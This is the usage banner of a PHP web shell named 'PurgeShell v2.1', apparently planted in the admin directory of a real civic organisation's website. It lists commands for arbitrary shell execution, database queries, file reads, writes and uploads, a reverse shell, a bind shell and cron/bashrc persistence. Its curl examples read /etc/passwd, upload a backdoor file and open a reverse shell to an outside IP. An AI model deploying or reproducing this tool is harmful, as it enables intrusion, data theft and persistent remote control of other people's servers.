------------------------------------------------------------ PurgeShell v2.1 | PHP 8.3.30 | Linux 4.18.0-553.109.1.lve.el8.x86_64 | x86_64 User: siscal5 | UID: 1762 | CWD: /home/siscal5/veeduriamiradaciudadana.org/admin/recursos/veedurias ------------------------------------------------------------ USAGE: ?cmd= Run shell command POST raw body Run shell command (body = command) ?c= Short command ?test=all Full pentest scan (15 checks) ?test=info JSON system info ?test=db&q=SELECT... Database query ?test=map&root=/&depth=3 Directory tree map ?read= Read file or list directory ?write=&cont= Write file -F "f=@file" Upload file (multipart POST) ?action=revshell&host=IP&port=4444 Reverse shell ?action=bindshell&port=1337 Bind shell ?action=persist Attempt persistence (cron/bashrc) ?action=selfdestruct Delete this shell ?p= Authentication (if configured) EXAMPLES: curl -k "target/shell.php?cmd=id" curl -k -X POST -d "cat /etc/passwd" "target/shell.php" curl -k -F "f=@backdoor.php" "target/shell.php" curl -k "target/shell.php?test=all" curl -k "target/shell.php?action=revshell&host=10.0.0.1&port=4444" ------------------------------------------------------------